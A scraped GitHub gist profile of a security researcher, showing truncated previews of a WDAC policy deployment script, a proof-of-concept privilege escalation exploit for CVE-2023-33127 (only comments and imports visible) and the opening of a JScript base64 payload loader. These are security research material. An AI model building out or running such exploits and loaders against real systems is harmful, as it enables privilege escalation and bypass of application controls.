Skip to content

Instantly share code, notes, and snippets.

View bohops's full-sized avatar

bohops

466 followers · 13 following
View GitHub Profile
@bohops
bohops / Deploy-EnforcedWDACScanPolicy.ps1
Last active May 17, 2024 01:05
Restrictive (with caveats) WDAC Policy for research purposes
Write-Host "
==============================================================================================================================
*Deploy an Enforced 'Scan' Windows Defender Application Control (WDAC)/Device Guard Policy with Code Integrity (UMCI)
*Focus: Permit signed applications at the PCACertificate level (e.g. Microsoft signed).
*For Testing on Windows 10/11 Business/Enterprise - Downloads and merges the WDAC Bypass Rules with a scan policy
*System reboots when PowerShell script finishes
*Run as a privileged user in high integrity
*To remove enforcement, comment out enforce line
@bohops
bohops / CVE-2023-33127.cs
Last active June 12, 2024 09:41
CVE-2023-33127: .NET Cross-Session Privilege Escalation Exploit
// CVE-2023-33127 POC Exploit: .NET Cross-Session Privilege Escalation
// Ref: https://bohops.com/2023/11/27/abusing-net-core-clr-diagnostic-features-cve-2023-33127/
using System;
using System.Runtime.InteropServices;
using System.Threading;
using System.Diagnostics;
using System.Security.Principal;
using System.IO.Pipes;
using System.IO;
@bohops
bohops / subteegadget.cs
Created May 16, 2024 20:27 — forked from rvrsh3ll/subteegadget.cs
[JS File]
function setversion() {
}
function debug(s) {}
function base64ToStream(b) {
var enc = new ActiveXObject("System.Text.ASCIIEncoding");
var length = enc.GetByteCount_2(b);
var ba = enc.GetBytes_4(b);